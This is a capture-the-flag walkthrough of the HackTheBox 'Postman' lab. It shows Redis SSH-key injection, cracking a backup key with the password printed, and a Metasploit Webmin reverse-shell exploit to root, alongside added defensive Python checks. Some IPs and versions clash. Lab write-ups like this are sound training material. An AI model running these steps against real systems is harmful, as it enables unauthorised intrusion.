Quick Summary
→ This easy machine is well suited to beginners learning the basics of penetration testing. The machine runs a vulnerable piece of software, Redis, which is unprotected with no password set up. The simplest thing you can do in such a case is write an arbitrary file, such as an SSH key, which I'll use to get into the machine. After getting the shell, there is an SSH key for the user Matt. The machine is very straightforward to root once you get the user's credentials and use them for another vulnerability, CVE Webmin 1.910.
Penetration Testing Methodologies
Network Scanning
→ Nmap scan
→ discover open ports and what services are running
Enumeration
→ Browsing the HTTP Service on different ports
→ Bruteforce the Web page directories
→ Check the software vulnerabilities
Post Exploitation
→ Check if we can inject or put some file inside in the Redis
→ The goal is to transfer SSH keys
→ Get in into redis shell
Exploitation
→ Find some interesting things using LinEnum.sh that can be used for exploitation
→ Get the backup SSH key of a user
→ Use the credentials for CVE Webmin 1.910
→ Get the root shell
Walkthrough
Network Scanning
→ First, I run Nmap to scan the target and get information about the various services running on the target machine. I use:
-sV ⇒ Probe open ports to determine service/version info
-sC ⇒ equivalent to --script=default
-T 0-5 ⇒ Set timing template (higher is faster, less accurate)
-p- ⇒ Scan all 65535 ports
-oN ⇒ save the scan results to a text file
nmap -sV -sC -T4 -p- 10.10.10.154 -oN nmap-postman
Nmap results
So these ports are open:
- 22 ⇒ running on OpenSSH 7.6p1
- 80 ⇒ running on Apache/2.24.49
- 6379 ⇒ running on Redis key-value version 4.0.9
- 10000 ⇒ running on MiniServ 1.910 (Webmin httpd)
Enumeration
I visited the web page on port 80 and there's nothing interesting here except Postman@htb, so I added it to my /etc/hosts.
Scan the Web directories
So, since I don't have any clue what is on the web page, I use the dirsearch web path scanner to find something with the following command.
root in htb/boxes/postman ❯ python3 /opt/dirsearch/dirsearch.py -u "http://10.10.10.160" -e asd -x 403,404 --simple-report=postman-directories
So I have the following directories; everything is a normal web directory except /upload/, which caught my attention.
[07:32:03] 301 - 310B - /css -> http://10.10.10.160/css/
[07:32:18] 301 - 312B - /fonts -> http://10.10.10.160/fonts/
[07:32:24] 301 - 313B - /images -> http://10.10.10.160/images/
[07:32:26] 200 - 4KB - /index.html
[07:32:29] 301 - 309B - /js -> http://10.10.10.160/js/
[07:33:26] 301 - 313B - /upload -> http://10.10.10.160/upload/
[07:33:26] 200 - 8KB - /upload/
Going to the /upload/ directory we see a lot of images. I tried to look for an interesting image, but I realized this is a rabbit hole, so I moved on to the next phase.
Upload page
Webmin 1.910
Next is to visit port 10000, which hosts an HTTP service, MiniServ 1.910 (Webmin httpd).
I searched for the Webmin version running on the machine to see if there's an existing exploit, and there is.
Webmin Package Updates Remote Code Execution.
→ Description: This module exploits an arbitrary command execution vulnerability in Webmin 1.910 and lower versions. Any user authorized to the “Package Updates” module can execute arbitrary commands with root privileges.
Since I don't have any credentials to use with that exploit, I'll leave it for a while and move on to the next phase of hunting.
Post Exploitation
Next is to try Redis, which appeared in my Nmap scan.
→ Redis is an open source (BSD licensed), in-memory data structure store, used as a database, cache and message broker.
I used the redis-tools package to communicate with the Redis service. The vulnerability in this version 4.0.9 instance is that you can interact with Redis without a username or password.
So, to start, let's check whether I can access the instance, which is a prerequisite:
Communicate with telnet
It works: Redis is unprotected, with no password set up.
Next is to try redis-cli to see if I get something.
root in htb/boxes/postman ❯ redis-cli -h 10.10.10.160
10.10.10.160:6379> get s-key
"\n\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC0+WZO2fM8J6HgUa5kgmE4xQwjMbiWFUYOND+7Qpm6a4XmJM6NABlIOUTe5FnUx+KZmcHlAenOqVdDPsa9rE1G9vZVi8OSFNJ6xplYzyFD9pzyFJ+e2Zz6c6RD2uptE9meJAiE+RQFpNM5TqZgpmlYGG1fi/2Pgtud7I0Lj95S/lRWqtvVN6uK44lKWru+YYwGtA+3unG+0lgRJrC+58+VFV/Cm54ZvJUd/I/4Q08ij6qx4AD1Y0xQqWKoDZMvb0kluzIRcvaYrTEKaFhxVpliVlqP6U3HFgeVZ2AJB redis@server\n\n\n\n"
10.10.10.160:6379>
Using the get s-key command inside redis shows that there's an existing SSH key used for authentication. As the redis user I can write the database contents to a file with the SAVE command, so I was thinking I could put my own key in to get access.
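The Redis weakness here is a deployment setting rather than a code bug, so a small audit of redis.conf catches it before anyone else does. The following Python check is an added example and not part of this writeup; the weak and hardened configurations it runs against are constructed for the example, and the requirepass value is a placeholder.

```python
"""Audit a redis.conf for the settings that made this box's file write possible."""
from typing import Dict, List

# Constructed sample: answers any client without AUTH and lets it run
# CONFIG SET dir/dbfilename followed by SAVE to drop a file anywhere.
WEAK_CONF = """
bind 0.0.0.0
protected-mode no
# requirepass is commented out, so no password is ever checked
dir /var/lib/redis
"""

# Constructed sample: the same service after hardening.
HARDENED_CONF = """
bind 127.0.0.1
protected-mode yes
requirepass REPLACE-WITH-A-LONG-RANDOM-SECRET
rename-command CONFIG ""
rename-command SAVE ""
dir /var/lib/redis
"""

def parse_conf(text: str) -> Dict[str, List[List[str]]]:
    """Map each directive to the argument lists of all its occurrences,
    skipping comments (rename-command legitimately repeats)."""
    conf: Dict[str, List[List[str]]] = {}
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            parts = line.split()
            conf.setdefault(parts[0].lower(), []).append(parts[1:])
    return conf

def audit(text: str) -> List[str]:
    """Return one finding per weak setting; empty means every check passed."""
    conf = parse_conf(text)
    findings = []
    if "requirepass" not in conf:
        findings.append("no requirepass: any client can issue commands")
    binds = {addr for args in conf.get("bind", []) for addr in args}
    if not binds or binds & {"0.0.0.0", "::", "*"}:
        findings.append("bind exposes the service on all interfaces")
    pm = conf.get("protected-mode", [["yes"]])[-1]
    if pm and pm[0].lower() == "no":
        findings.append("protected-mode is off")
    renamed = {args[0].upper() for args in conf.get("rename-command", []) if args}
    for cmd in ("CONFIG", "SAVE"):
        if cmd not in renamed:
            findings.append(f"{cmd} not renamed: dir/dbfilename can be pointed at any file")
    return findings
```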
Inject SSH Keys
Since Redis is not protected, I'll try to write into ~/.ssh/authorized_keys in order to gain shell access. So I'll generate my SSH key first and save it in my postman directory.
An OpenSSH-format key will not be valid; to get this to work I need an RSA PRIVATE KEY in PEM format. With this line I can generate my SSH key as a PEM private key:
ssh-keygen -m PEM -t rsa -b 4096 -C bunny@lanaya
Generated SSH Key
Now I have a key. My goal is to put it into the Redis server memory and later transfer it into a file, in a way that the resulting authorized_keys file is still a valid one.
So, by following this method, I will now put my generated SSH key in.
Now let's put my SSH key into Redis.
Using redis-cli I can check, set a directory for Redis, and save.
I've successfully saved my SSH key. Now I'll try to log in with SSH.
root in htb/boxes/postman ❯ ssh -v -i id_rsa redis@10.10.10.160
OpenSSH_8.1p1 Debian-1, OpenSSL 1.1.1d 10 Sep 2019
debug1: Reading configuration data /etc/ssh/ssh_config
debug1: /etc/ssh/ssh_config line 19: Applying options for *
debug1: Connecting to 10.10.10.160 [10.10.10.160] port 22.
debug1: Connection established.
debug1: identity file id_rsa type 0
debug1: identity file id_rsa-cert type -1
debug1: Local version string SSH-2.0-OpenSSH_8.1p1 Debian-1
debug1: Remote protocol version 2.0, remote software version OpenSSH_7.6p1 Ubuntu-4ubuntu0.3
debug1: match: OpenSSH_7.6p1 Ubuntu-4ubuntu0.3 pat OpenSSH_7.0*,OpenSSH_7.1*,OpenSSH_7.2*,OpenSSH_7.3*,OpenSSH_7.4*,OpenSSH_7.5*,OpenSSH_7.6*,OpenSSH_7.7* compat 0x04000002
debug1: Authenticating to 10.10.10.160:22 as 'redis'
debug1: SSH2_MSG_KEXINIT sent
debug1: SSH2_MSG_KEXINIT received
debug1: kex: algorithm: curve25519-sha256
debug1: kex: host key algorithm: ecdsa-sha2-nistp256
debug1: kex: server->client cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
debug1: kex: client->server cipher: chacha20-poly1305@openssh.com MAC: <implicit> compression: none
debug1: expecting SSH2_MSG_KEX_ECDH_REPLY
debug1: Server host key: ecdsa-sha2-nistp256 SHA256:kea9iwskZTAT66U8yNRQiTa6t35LX8p0jOpTfvgeCh0
debug1: Host '10.10.10.160' is known and matches the ECDSA host key.
debug1: Found key in /root/.ssh/known_hosts:3
debug1: rekey out after 134217728 blocks
debug1: SSH2_MSG_NEWKEYS sent
debug1: expecting SSH2_MSG_NEWKEYS
debug1: SSH2_MSG_NEWKEYS received
debug1: rekey in after 134217728 blocks
debug1: Will attempt key: id_rsa RSA SHA256:RHbmsaWNCcKp3yQZ5DzJzY7qtBWYIMl5z5h3BT1dbP8 explicit
debug1: SSH2_MSG_EXT_INFO received
debug1: kex_input_ext_info: server-sig-algs=<ssh-ed25519,ssh-rsa,rsa-sha2-256,rsa-sha2-512,ssh-dss,ecdsa-sha2-nistp256,ecdsa-sha2-nistp384,ecdsa-sha2-nistp521>
debug1: SSH2_MSG_SERVICE_ACCEPT received
debug1: Authentications that can continue: publickey,password
debug1: Next authentication method: publickey
debug1: Offering public key: id_rsa RSA SHA256:RHbmsaWNCcKp3yQZ5DzJzY7qtBWYIMl5z5h3BT1dbP8 explicit
debug1: Server accepts key: id_rsa RSA SHA256:RHbmsaWNCcKp3yQZ5DzJzY7qtBWYIMl5z5h3BT1dbP8 explicit
debug1: Authentication succeeded (publickey).
Authenticated to 10.10.10.160 ([10.10.10.160]:22).
debug1: channel 0: new [client-session]
debug1: Requesting no-more-sessions@openssh.com
debug1: Entering interactive session.
debug1: pledge: network
debug1: client_input_global_request: rtype hostkeys-00@openssh.com want_reply 0
debug1: Sending environment.
debug1: Sending env LANG = en_US.utf8
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings

Last login: Sun Mar 15 00:54:05 2020 from 10.10.15.124
redis@Postman:~$ whoami
redis
It works! I now have the initial shell.
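The injected key only works because sshd skips the RDB bytes that SAVE writes around it, which also makes such a file easy to spot on the defending side. This Python scanner is an added example, not part of the writeup or the box; the Ed25519 key and the file layout it is tested against are constructed for the example.

```python
"""Report authorized_keys lines that are not well-formed OpenSSH entries.
The Redis SAVE trick dumps an RDB snapshot into authorized_keys and relies on
sshd skipping every line it cannot parse, so unparseable lines deserve an alert."""
import base64

KEY_TYPES = {"ssh-rsa", "ssh-dss", "ssh-ed25519", "ecdsa-sha2-nistp256",
             "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521"}

def _blob_type(blob: bytes) -> str:
    """Return the key-type string that opens an SSH wire-format public key."""
    n = int.from_bytes(blob[:4], "big")
    return blob[4:4 + n].decode("ascii", "replace") if len(blob) >= 4 + n else ""

def is_valid_entry(line: str) -> bool:
    """True for '[options] keytype base64 [comment]' whose blob matches keytype."""
    fields = line.split()
    for i, field in enumerate(fields):  # options such as from="..." may precede
        if field in KEY_TYPES and i + 1 < len(fields):
            try:
                blob = base64.b64decode(fields[i + 1], validate=True)
            except ValueError:  # binascii.Error is a ValueError
                return False
            return _blob_type(blob) == field
    return False

def scan_authorized_keys(data: bytes) -> list:
    """Return (line number, reason) for every line sshd would have to skip."""
    findings = []
    for no, raw in enumerate(data.split(b"\n"), 1):
        text = raw.decode("utf-8", "replace").strip()
        if not text or text.startswith("#"):
            continue
        if raw.lstrip().startswith(b"REDIS"):
            findings.append((no, "Redis RDB header"))
        elif any(b < 0x20 and b != 0x09 for b in raw.rstrip(b"\r")):
            findings.append((no, "binary data"))
        elif not is_valid_entry(text):
            findings.append((no, "unparseable entry"))
    return findings

# Constructed test key (all-zero Ed25519 point): valid in form only.
_BLOB = (11).to_bytes(4, "big") + b"ssh-ed25519" + (32).to_bytes(4, "big") + bytes(32)
GOOD_LINE = b"ssh-ed25519 " + base64.b64encode(_BLOB) + b" redis@server"
# Constructed approximation of what SAVE leaves around the newline-padded key.
INJECTED_FILE = (b"REDIS0008\xfa\tredis-ver\x054.0.9\xfe\x00\x00\x03key\n\n\n"
                 + GOOD_LINE + b"\n\n\n\xff\x8b\x01\x02\x03\n")
```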
Exploitation
Recon
For recon I'll use LinEnum.sh (Scripted Local Linux Enumeration & Privilege Escalation Checks). It helps find weaknesses and saves time on privilege escalation. I uploaded it to the /tmp/ directory as the redis user and executed it.
At first it shows the system information of the Postman machine.
Shell user
I see the user Matt, and also my shell user, redis.
Backup private SSH Key
Going deeper in recon, there's a file that caught my attention: a backup SSH key of some user. Based on the info shown, it is owned by the user Matt.
Going to the /opt/ directory, I tried to transfer id_rsa.bak to my machine, but it didn't seem to work, so I used cat to view the file's content.
Cracking the hash
I copied the content of id_rsa.bak to my machine, used ssh2john to convert it, and cracked it with John the Ripper.
Cracking this using John the Ripper.
Only 14 seconds. I've now got the password of Matt.
Login as Matt
I can now log in as Matt and get user.txt.
CVE Webmin 1.910
In the early stage of my penetration test on this machine there was an existing vulnerability, CVE Webmin 1.910, that needs credentials. I'll use Metasploit to do the exploitation and pick webmin_packageup_rce.
I will use the credentials for Matt and let's see what happens ;)
msf5 exploit(linux/http/webmin_packageup_rce) > show options

Module options (exploit/linux/http/webmin_packageup_rce):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   PASSWORD                    yes       Webmin Password
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      10000            yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path for Webmin application
   USERNAME                    yes       Webmin Username
   VHOST                       no        HTTP server virtual host

Payload options (cmd/unix/reverse_perl):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Webmin <= 1.910
Based on the options, it requires PASSWORD, RPORT (on the default 10000), RHOSTS (the victim IP, Postman), SSL (which I'll set to true), and USERNAME, so:
msf5 exploit(linux/http/webmin_packageup_rce) > set PASSWORD computer2008
PASSWORD => computer2008
msf5 exploit(linux/http/webmin_packageup_rce) > set RHOSTS 10.10.10.160
RHOSTS => 10.10.10.160
msf5 exploit(linux/http/webmin_packageup_rce) > set SSL true
SSL => true
msf5 exploit(linux/http/webmin_packageup_rce) > set USERNAME Matt
USERNAME => Matt
msf5 exploit(linux/http/webmin_packageup_rce) > set LHOST 10.10.10.160
LHOST => 10.10.10.160
msf5 exploit(linux/http/webmin_packageup_rce) > exploit

[*] Started reverse TCP handler on 10.10.15.124:4444
[+] Session cookie: 6fda9f4ceb95660a3799aaf46bffea37
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.15.124:4444 -> 10.10.10.160:47708) at 2020-03-15 09:33:49 +0800

[*] Trying to find binary(python) on target machine
[*] Found python at /usr/bin/python
[*] Using `python` to pop up an interactive shell
It works! To upgrade my shell I use import pty in Python:
python -c 'import pty; pty.spawn("/bin/bash");'
Root
Very straightforward. Rooted! Now I can get root.txt.
root@Postman:~# id
id
uid=0(root) gid=0(root) groups=0(root)
If you liked my writeup please leave a respect on my Profile
References:
Exploit Redis Server Article
Pentesting with Redis
Official Exploit of Webmin 1.910
How to get in into the machine with Redis Exploitation